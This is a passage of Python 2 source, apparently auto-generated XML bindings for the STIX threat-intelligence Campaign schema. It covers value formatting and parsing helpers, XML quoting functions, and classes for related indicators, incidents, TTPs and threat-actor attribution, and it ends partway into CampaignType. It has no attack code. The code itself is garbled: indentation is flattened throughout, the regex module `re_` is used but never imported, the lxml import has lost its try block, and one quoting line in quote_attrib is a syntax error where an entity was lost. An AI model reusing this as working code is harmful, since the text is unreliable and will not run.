import stix.bindings.stix_common as stix_common_binding
import stix.bindings.data_marking as data_marking_binding
import base64
from datetime import datetime, tzinfo, timedelta
XML_NS = "http://stix.mitre.org/Campaign-1"
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser(huge_tree=True)
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(tzinfo):
def __init__(self, offset, name):
self.__offset = timedelta(minutes = offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if isinstance(input_data, basestring):
return input_data
if input_data.microsecond == 0:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S')
else:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S.%f')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_datetime(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
return dt.replace(tzinfo = tz)
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = input_data.strftime('%Y-%m-%d')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_date(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
return datetime.strptime(input_data,
'%Y-%m-%d').replace(tzinfo = tz)
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'utf-8'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(lwrite, level, pretty_print=True):
if pretty_print:
lwrite(' ' * level)
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
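# Illustrative results of the quoting helpers above (inputs hypothetical):
#   quote_xml('a & b')        -> 'a &amp; b'
#   quote_attrib('a & b')     -> '"a &amp; b"'
#   quote_attrib('say "hi"')  -> single-quoted form, since the value contains
#                                a double quote but no single quote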
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, lwrite, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
lwrite(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(lwrite, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(lwrite, level, namespace, name, pretty_print)
def exportSimple(self, lwrite, level, name):
if self.content_type == MixedContainer.TypeString:
lwrite('<%s>%s</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
lwrite('<%s>%d</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
lwrite('<%s>%f</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
lwrite('<%s>%g</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
lwrite('<%s>%s</%s>' %
(self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, lwrite, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(lwrite, level + 1)
showIndent(lwrite, level)
lwrite(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class NamesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Name=None):
if Name is None:
self.Name = []
else:
self.Name = Name
def factory(*args_, **kwargs_):
if NamesType.subclass:
return NamesType.subclass(*args_, **kwargs_)
else:
return NamesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def add_Name(self, value): self.Name.append(value)
def insert_Name(self, index, value): self.Name[index] = value
def hasContent_(self):
if (
self.Name
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='NamesType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='NamesType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='NamesType'):
pass
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='NamesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Name_ in self.Name:
Name_.export(lwrite, level, nsmap, namespace_, name_='Name', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Name':
obj_ = stix_common_binding.ControlledVocabularyStringType.factory()
obj_.build(child_)
self.Name.append(obj_)
# end class NamesType
class AssociatedCampaignsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Associated_Campaign=None):
super(AssociatedCampaignsType, self).__init__(scope=scope)
if Associated_Campaign is None:
self.Associated_Campaign = []
else:
self.Associated_Campaign = Associated_Campaign
def factory(*args_, **kwargs_):
if AssociatedCampaignsType.subclass:
return AssociatedCampaignsType.subclass(*args_, **kwargs_)
else:
return AssociatedCampaignsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Associated_Campaign(self): return self.Associated_Campaign
def set_Associated_Campaign(self, Associated_Campaign): self.Associated_Campaign = Associated_Campaign
def add_Associated_Campaign(self, value): self.Associated_Campaign.append(value)
def insert_Associated_Campaign(self, index, value): self.Associated_Campaign[index] = value
def hasContent_(self):
if (
self.Associated_Campaign or
super(AssociatedCampaignsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AssociatedCampaignsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='AssociatedCampaignsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='AssociatedCampaignsType'):
super(AssociatedCampaignsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='AssociatedCampaignsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AssociatedCampaignsType', fromsubclass_=False, pretty_print=True):
super(AssociatedCampaignsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Associated_Campaign_ in self.Associated_Campaign:
Associated_Campaign_.export(lwrite, level, nsmap, namespace_, name_='Associated_Campaign', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(AssociatedCampaignsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Associated_Campaign':
obj_ = stix_common_binding.RelatedCampaignType.factory()
obj_.build(child_)
self.Associated_Campaign.append(obj_)
super(AssociatedCampaignsType, self).buildChildren(child_, node, nodeName_, True)
# end class AssociatedCampaignsType
class RelatedIndicatorsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Related_Indicator=None):
super(RelatedIndicatorsType, self).__init__(scope=scope)
if Related_Indicator is None:
self.Related_Indicator = []
else:
self.Related_Indicator = Related_Indicator
def factory(*args_, **kwargs_):
if RelatedIndicatorsType.subclass:
return RelatedIndicatorsType.subclass(*args_, **kwargs_)
else:
return RelatedIndicatorsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Related_Indicator(self): return self.Related_Indicator
def set_Related_Indicator(self, Related_Indicator): self.Related_Indicator = Related_Indicator
def add_Related_Indicator(self, value): self.Related_Indicator.append(value)
def insert_Related_Indicator(self, index, value): self.Related_Indicator[index] = value
def hasContent_(self):
if (
self.Related_Indicator or
super(RelatedIndicatorsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIndicatorsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIndicatorsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='RelatedIndicatorsType'):
super(RelatedIndicatorsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIndicatorsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIndicatorsType', fromsubclass_=False, pretty_print=True):
super(RelatedIndicatorsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Related_Indicator_ in self.Related_Indicator:
Related_Indicator_.export(lwrite, level, nsmap, namespace_, name_='Related_Indicator', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(RelatedIndicatorsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Related_Indicator':
obj_ = stix_common_binding.RelatedIndicatorType.factory()
obj_.build(child_)
self.Related_Indicator.append(obj_)
super(RelatedIndicatorsType, self).buildChildren(child_, node, nodeName_, True)
# end class RelatedIndicatorsType
class RelatedIncidentsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Related_Incident=None):
super(RelatedIncidentsType, self).__init__(scope=scope)
if Related_Incident is None:
self.Related_Incident = []
else:
self.Related_Incident = Related_Incident
def factory(*args_, **kwargs_):
if RelatedIncidentsType.subclass:
return RelatedIncidentsType.subclass(*args_, **kwargs_)
else:
return RelatedIncidentsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Related_Incident(self): return self.Related_Incident
def set_Related_Incident(self, Related_Incident): self.Related_Incident = Related_Incident
def add_Related_Incident(self, value): self.Related_Incident.append(value)
def insert_Related_Incident(self, index, value): self.Related_Incident[index] = value
def hasContent_(self):
if (
self.Related_Incident or
super(RelatedIncidentsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIncidentsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIncidentsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='RelatedIncidentsType'):
super(RelatedIncidentsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIncidentsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIncidentsType', fromsubclass_=False, pretty_print=True):
super(RelatedIncidentsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Related_Incident_ in self.Related_Incident:
Related_Incident_.export(lwrite, level, nsmap, namespace_, name_='Related_Incident', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(RelatedIncidentsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Related_Incident':
obj_ = stix_common_binding.RelatedIncidentType.factory()
obj_.build(child_)
self.Related_Incident.append(obj_)
super(RelatedIncidentsType, self).buildChildren(child_, node, nodeName_, True)
# end class RelatedIncidentsType
class RelatedTTPsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Related_TTP=None):
super(RelatedTTPsType, self).__init__(scope=scope)
if Related_TTP is None:
self.Related_TTP = []
else:
self.Related_TTP = Related_TTP
def factory(*args_, **kwargs_):
if RelatedTTPsType.subclass:
return RelatedTTPsType.subclass(*args_, **kwargs_)
else:
return RelatedTTPsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Related_TTP(self): return self.Related_TTP
def set_Related_TTP(self, Related_TTP): self.Related_TTP = Related_TTP
def add_Related_TTP(self, value): self.Related_TTP.append(value)
def insert_Related_TTP(self, index, value): self.Related_TTP[index] = value
def hasContent_(self):
if (
self.Related_TTP or
super(RelatedTTPsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedTTPsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedTTPsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='RelatedTTPsType'):
super(RelatedTTPsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedTTPsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedTTPsType', fromsubclass_=False, pretty_print=True):
super(RelatedTTPsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Related_TTP_ in self.Related_TTP:
Related_TTP_.export(lwrite, level, nsmap, namespace_, name_='Related_TTP', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(RelatedTTPsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Related_TTP':
obj_ = stix_common_binding.RelatedTTPType.factory()
obj_.build(child_)
self.Related_TTP.append(obj_)
super(RelatedTTPsType, self).buildChildren(child_, node, nodeName_, True)
# end class RelatedTTPsType
class AttributionType(stix_common_binding.GenericRelationshipListType):
"""AttributionType specifies suspected Threat Actors attributed to a
given Campaign."""
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Attributed_Threat_Actor=None):
super(AttributionType, self).__init__(scope=scope)
if Attributed_Threat_Actor is None:
self.Attributed_Threat_Actor = []
else:
self.Attributed_Threat_Actor = Attributed_Threat_Actor
def factory(*args_, **kwargs_):
if AttributionType.subclass:
return AttributionType.subclass(*args_, **kwargs_)
else:
return AttributionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Attributed_Threat_Actor(self): return self.Attributed_Threat_Actor
def set_Attributed_Threat_Actor(self, Attributed_Threat_Actor): self.Attributed_Threat_Actor = Attributed_Threat_Actor
def add_Attributed_Threat_Actor(self, value): self.Attributed_Threat_Actor.append(value)
def insert_Attributed_Threat_Actor(self, index, value): self.Attributed_Threat_Actor[index] = value
def hasContent_(self):
if (
self.Attributed_Threat_Actor or
super(AttributionType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AttributionType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='AttributionType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='AttributionType'):
super(AttributionType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='AttributionType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AttributionType', fromsubclass_=False, pretty_print=True):
super(AttributionType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Attributed_Threat_Actor_ in self.Attributed_Threat_Actor:
Attributed_Threat_Actor_.export(lwrite, level, nsmap, namespace_, name_='Attributed_Threat_Actor', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(AttributionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Attributed_Threat_Actor':
obj_ = stix_common_binding.RelatedThreatActorType.factory()
obj_.build(child_)
self.Attributed_Threat_Actor.append(obj_)
super(AttributionType, self).buildChildren(child_, node, nodeName_, True)
# end class AttributionType
class CampaignType(stix_common_binding.CampaignBaseType):
"""The CampaignType characterizes a single cyber threat
Campaign.Specifies the relevant STIX-Campaign schema version for
this content."""
subclass = None
superclass = stix_common_binding.CampaignBaseType
def __init__(self, idref=None, id=None, timestamp=None, version=None, Title=None, Description=None, Short_Description=None, Names=None, Intended_Effect=None, Status=None, Related_TTPs=None, Related_Incidents=None, Related_Indicators=None, Attribution=None, Associated_Campaigns=None, Confidence=None, Activity=None, Information_Source=None, Handling=None, Related_Packages=None):
super(CampaignType, self).__init__(idref=idref, id=id, timestamp=timestamp)
self.xmlns = "http://stix.mitre.org/Campaign-1"
self.xmlns_prefix = "campaign"
self.xml_type = "CampaignType"
self.version = _cast(None, version)
self.Title = Title
